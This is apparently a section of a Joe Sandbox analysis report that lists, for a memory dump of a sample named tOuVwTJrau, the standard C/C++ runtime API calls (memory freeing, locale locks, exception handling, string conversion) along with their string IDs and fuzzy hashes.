                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: @b4
                                                                • API String ID: 269201875-4188318018
                                                                • Opcode ID: ef735fe094cd636774b5a433ecde4340c71c00d5dbea582419a4adac8675a12d
                                                                • Instruction ID: 9cef1d32e6d68c454fe279eec312b9784a29355c8c2d3cc96fba3897faea5d1d
                                                                • Opcode Fuzzy Hash: ef735fe094cd636774b5a433ecde4340c71c00d5dbea582419a4adac8675a12d
                                                                • Instruction Fuzzy Hash: 16613672900314AFDB22EF65D941FEAB7F9EF5A710F114419E949EB281EB70ED408B50
                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0030D20F
                                                                • type_info::operator==.LIBVCRUNTIME ref: 0030D231
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0030D340
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0030D412
                                                                • _UnwindNestedFrames.LIBCMT ref: 0030D496
                                                                • CallUnexpected.LIBVCRUNTIME ref: 0030D4B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 2123188842-393685449
                                                                • Opcode ID: 40deee1d6a632787d574a563a33775a7b9b7460bf641d28f7b5ac933f04b8626
                                                                • Instruction ID: f6653c5064941f829808b3464e59aa5952060a2da4f8ad2b15e9956317aa3484
                                                                • Opcode Fuzzy Hash: 40deee1d6a632787d574a563a33775a7b9b7460bf641d28f7b5ac933f04b8626
                                                                • Instruction Fuzzy Hash: D5B1AB75802209EFCF1ADFE5C8A19AEBBF5FF04310B154569F8156B282DB30EA51CB91
                                                                APIs
                                                                • _free.LIBCMT ref: 003170BE
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • _free.LIBCMT ref: 003170CA
                                                                • _free.LIBCMT ref: 003170D5
                                                                • _free.LIBCMT ref: 003170E0
                                                                • _free.LIBCMT ref: 003170EB
                                                                • _free.LIBCMT ref: 003170F6
                                                                • _free.LIBCMT ref: 00317101
                                                                • _free.LIBCMT ref: 0031710C
                                                                • _free.LIBCMT ref: 00317117
                                                                • _free.LIBCMT ref: 00317125
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3ebac56eecf814cc8e98bbe940c2117d3b073186149ce75a30eab6c84fbc8a34
                                                                • Instruction ID: 755ca38d558c19c221c83e35942454d17f70091678e2c6750f8a09bf541e6d25
                                                                • Opcode Fuzzy Hash: 3ebac56eecf814cc8e98bbe940c2117d3b073186149ce75a30eab6c84fbc8a34
                                                                • Instruction Fuzzy Hash: 60219876910108AFCB46EF94CD81DDE7BB9EF88340F0151A5B515AF121EB31EA84CB94
                                                                APIs
                                                                  • Part of subcall function 003171C0: GetLastError.KERNEL32(?,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 003171C5
                                                                  • Part of subcall function 003171C0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0030E627,?,?,?,?,0030F4C2,?), ref: 00317263
                                                                • _free.LIBCMT ref: 0031604B
                                                                • _free.LIBCMT ref: 00316064
                                                                • _free.LIBCMT ref: 003160A2
                                                                • _free.LIBCMT ref: 003160AB
                                                                • _free.LIBCMT ref: 003160B7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorLast
                                                                • String ID: C$`&0$O1
                                                                • API String ID: 3291180501-831739358
                                                                • Opcode ID: 29455203d412a5619768c1ade42d486d3a8ff952c3a9a40d229319912184da11
                                                                • Instruction ID: f318674e09c9cac1bf89488a7a30eaffd27aa4f640bd2ddf5f0e64fe141a6455
                                                                • Opcode Fuzzy Hash: 29455203d412a5619768c1ade42d486d3a8ff952c3a9a40d229319912184da11
                                                                • Instruction Fuzzy Hash: 73B15975901619DFDB2ADF18C885AE9B3B4FF4C304F5145AAE849A7290E731AED0CF50
                                                                APIs
                                                                  • Part of subcall function 003187D5: HeapAlloc.KERNEL32(00000000,?,?,?,0031FF40,00000220,?,?,?,?,?,?,0030F4C2,?), ref: 00318807
                                                                • _free.LIBCMT ref: 003159E4
                                                                • _free.LIBCMT ref: 003159FB
                                                                • _free.LIBCMT ref: 00315A18
                                                                • _free.LIBCMT ref: 00315A33
                                                                • _free.LIBCMT ref: 00315A4A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$AllocHeap
                                                                • String ID: lM3$O1
                                                                • API String ID: 1835388192-4015815100
                                                                • Opcode ID: 03f0fe1dbbfbb91281cf1f35676855fd0552aaae3c92588ae5ff54aba677b767
                                                                • Instruction ID: 3ef69a1c1b6d6b797cce4cd2039cc558245fadedd9bb09aa3450e1a415f92330
                                                                • Opcode Fuzzy Hash: 03f0fe1dbbfbb91281cf1f35676855fd0552aaae3c92588ae5ff54aba677b767
                                                                • Instruction Fuzzy Hash: 6E51E571A00604DFDB2BDF69CC81AEAB7F5EF98720F150659E805DB251E731EA818B50
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 0030CC17
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0030CC1F
                                                                • _ValidateLocalCookies.LIBCMT ref: 0030CCA8
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0030CCD3
                                                                • _ValidateLocalCookies.LIBCMT ref: 0030CD28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: `&0$csm
                                                                • API String ID: 1170836740-4040489779
                                                                • Opcode ID: ebf92c62d0ca560d887d615ebede707dbf6af19f502408fd3c363388f1c77227
                                                                • Instruction ID: 9e5751a504a602b9161f7a813ae8ad1f851fffede4afffc9cd6889958cf16710
                                                                • Opcode Fuzzy Hash: ebf92c62d0ca560d887d615ebede707dbf6af19f502408fd3c363388f1c77227
                                                                • Instruction Fuzzy Hash: 1941E534A112099BCF02DF68C8A1A9EBBF5EF45314F148255E819AF3D2D731A916CB91
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                • String ID:
                                                                • API String ID: 3990724213-0
                                                                • Opcode ID: aa77fab2eadc0b07d8ea16985306c09ea76c7649e5cbff62a4fda2afe22db6b8
                                                                • Instruction ID: 680e041eb45057c0c426366d256ffd4db90d8c9de6a70eb0289b65508910db79
                                                                • Opcode Fuzzy Hash: aa77fab2eadc0b07d8ea16985306c09ea76c7649e5cbff62a4fda2afe22db6b8
                                                                • Instruction Fuzzy Hash: BAB11471D026099FDF26DF64C869BAFBBB4EF05300F00456EE8169B6D2DB31A904CB91
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00309C0F
                                                                • __alloca_probe_16.LIBCMT ref: 00309C3B
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00309C7A
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00309C97
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00309CD6
                                                                • __alloca_probe_16.LIBCMT ref: 00309CF3
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00309D35
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00309D58
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                • String ID:
                                                                • API String ID: 2040435927-0
                                                                • Opcode ID: 6f16039ec4c43678f042e708623b7f9e291647693a11864c4d7e6b3eba302c9a
                                                                • Instruction ID: 8e037233d0e3445970f66e6cd7c2534d1e5dbc575f09f2e17e2456839a4d0f9d
                                                                • Opcode Fuzzy Hash: 6f16039ec4c43678f042e708623b7f9e291647693a11864c4d7e6b3eba302c9a
                                                                • Instruction Fuzzy Hash: A051B07254220AABEF229FA5DC55FAB7BB9EF44750F154126F901DA1E1E730CD10CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: list too long
                                                                • API String ID: 0-1124181908
                                                                • Opcode ID: 02b67199468ddfeb8996ac42fa5b12567645a17ac067e22d8282590522fb0f89
                                                                • Instruction ID: 293db4f191d985d64b043653cc6457122946cf43a784991f4b2f959b6be4e521
                                                                • Opcode Fuzzy Hash: 02b67199468ddfeb8996ac42fa5b12567645a17ac067e22d8282590522fb0f89
                                                                • Instruction Fuzzy Hash: 565192B4D047199BDB11DF64DC85B9AF7B8FF05300F0042A9E908AB291DB70AE95CF91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Y3$X3
                                                                • API String ID: 0-3297137604
                                                                • Opcode ID: 938d41d4c9ae6dff59c9750d0eebc4c85d7dc8f51d3690ff03204e09531cf79c
                                                                • Instruction ID: eb546e68dc2a70e89d19a877cae942592ee7b57bb8194bf1a73b74cd01a37e75
                                                                • Opcode Fuzzy Hash: 938d41d4c9ae6dff59c9750d0eebc4c85d7dc8f51d3690ff03204e09531cf79c
                                                                • Instruction Fuzzy Hash: 1F410972B01745EFE726AF38CC51B9ABBA9EB88710F11892EF111DF6C1D771A9408780
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00305336
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00305356
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00305376
                                                                • std::_Facet_Register.LIBCPMT ref: 00305411
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00305429
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                • String ID: B0
                                                                • API String ID: 459529453-336002998
                                                                • Opcode ID: 82479f546715088a84887f3c8038dee959aeb58dea030c6cf721192c965cd812
                                                                • Instruction ID: 05e6ab72f6b72bab4aacd717f515a73bb41f73c255816f0ffae10d40419b5243
                                                                • Opcode Fuzzy Hash: 82479f546715088a84887f3c8038dee959aeb58dea030c6cf721192c965cd812
                                                                • Instruction Fuzzy Hash: 2341DB75A026148BCB26DF54C8A1BAFB7B8EB01710F1541ADE8466B2D1DB70BD01CF80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: 8e96f37249a0343272190e56b8f55cfa979203c77095372ee5ef23d728fcbaa1
                                                                • Instruction ID: a3a47bfb53cf7749d6d9c4eb0405440993884b95ac82debf953a4d53c1c1febe
                                                                • Opcode Fuzzy Hash: 8e96f37249a0343272190e56b8f55cfa979203c77095372ee5ef23d728fcbaa1
                                                                • Instruction Fuzzy Hash: AF21E7B2A09211ABDB2B8B749C85ADB376C9F0D760F264511FC06E7291DF70EC40C6E4
                                                                APIs
                                                                  • Part of subcall function 00321522: _free.LIBCMT ref: 00321547
                                                                • _free.LIBCMT ref: 00321824
                                                                  • Part of subcall function 003185A6: HeapFree.KERNEL32(00000000,00000000,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?), ref: 003185BC
                                                                  • Part of subcall function 003185A6: GetLastError.KERNEL32(?,?,0032154C,?,00000000,?,?,?,003217EF,?,00000007,?,?,00321C94,?,?), ref: 003185CE
                                                                • _free.LIBCMT ref: 0032182F
                                                                • _free.LIBCMT ref: 0032183A
                                                                • _free.LIBCMT ref: 0032188E
                                                                • _free.LIBCMT ref: 00321899
                                                                • _free.LIBCMT ref: 003218A4
                                                                • _free.LIBCMT ref: 003218AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction ID: 46a6019c40227fa3f8ad6cdacb4ebede71b1d1c06a8496b291ca87ddec1839b9
                                                                • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction Fuzzy Hash: 88118132941B14BAD532BBB0DD47FCBB7DD9F9A700F804C14B29BAE052DA24F6454750
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0030E287,?,?,0030E24F,?,?,?), ref: 0030E2A7
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0030E2BA
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0030E287,?,?,0030E24F,?,?,?), ref: 0030E2DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$`&0$mscoree.dll
                                                                • API String ID: 4061214504-733743835
                                                                • Opcode ID: b099843ca358c17e2c6f566182cc041300f177d91ce80a620b1520fa2a5c7da4
                                                                • Instruction ID: 6a3ac550efcafb1931f6b3826fe33fed1d478b457a23a4380eda34244a1cdafa
                                                                • Opcode Fuzzy Hash: b099843ca358c17e2c6f566182cc041300f177d91ce80a620b1520fa2a5c7da4
                                                                • Instruction Fuzzy Hash: 96F08C31A01218FBDB13AB90ED4ABDEBABCEB00756F114460F901E21A0CB748F00DB90
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 287c6d18d68f1f26fc38907820d9fda58763dc094f52a36e64300846d69e8951
                                                                • Instruction ID: e2106db7b7863d2617475e2ad1b09dcb193368bee30c39af2ed318aae8ec483d
                                                                • Opcode Fuzzy Hash: 287c6d18d68f1f26fc38907820d9fda58763dc094f52a36e64300846d69e8951
                                                                • Instruction Fuzzy Hash: CCE15871A1014C9BEF19DF68CD997ADFB76AF41340F608228F505AB3C2C7759A90CB91
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00317BA7
                                                                • __fassign.LIBCMT ref: 00317D8C
                                                                • __fassign.LIBCMT ref: 00317DA9
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00317DF1
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00317E31
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00317ED9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 1735259414-0
                                                                • Opcode ID: 5f34118e55a023deac17e7d81a0c20f12a3f3b5c9f00c342077ad79a7adaf82f
                                                                • Instruction ID: 137c1f8d6b493fc5a7961c667265b5661a92327ac616c8764279aa7b23bb1fb3
                                                                • Opcode Fuzzy Hash: 5f34118e55a023deac17e7d81a0c20f12a3f3b5c9f00c342077ad79a7adaf82f
                                                                • Instruction Fuzzy Hash: 24C18175D042589FCB1ACFA8D8809EDBBF9AF4D314F28416AE855FB241D6319D82CF60
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00304BA5
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00304BC7
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00304BE7
                                                                • __Getctype.LIBCPMT ref: 00304C7D
                                                                • std::_Facet_Register.LIBCPMT ref: 00304C9C
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00304CB4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674367752.000000000034D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_tOuVwTJrau.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                • String ID:
                                                                • API String ID: 1102183713-0
                                                                • Opcode ID: 3adbb51ac14c346ce420c0d2a3413801e3b8776739e6aee13774c9d1487b318f
                                                                • Instruction ID: 9ba341af1ece198c2f183a1966f22af4ccc2f9b21d58014d2122297f09bdc7f4
                                                                • Opcode Fuzzy Hash: 3adbb51ac14c346ce420c0d2a3413801e3b8776739e6aee13774c9d1487b318f
                                                                • Instruction Fuzzy Hash: F641CDB0D022549BDB27DF54C8A0BAEB7F8EF55710F144169E846AB291EF30BE41CB91
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0030CD9B,0030B434,00308149,AA6E0749,?,?,?,00000000,0032CE07,000000FF,?,002E2576,?,?), ref: 0030CDB2
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0030CDC0
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0030CDD9
                                                                • SetLastError.KERNEL32(00000000,?,00000000,0032CE07,000000FF,?,002E2576,?,?,?,002E3BA5,00000000,?,00000000,0032C7A0,000000FF), ref: 0030CE2B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1674283711.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1674266355.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1674348462.0000000000346000.00000004.00000001.01000000.00000003.sdmpDownload File
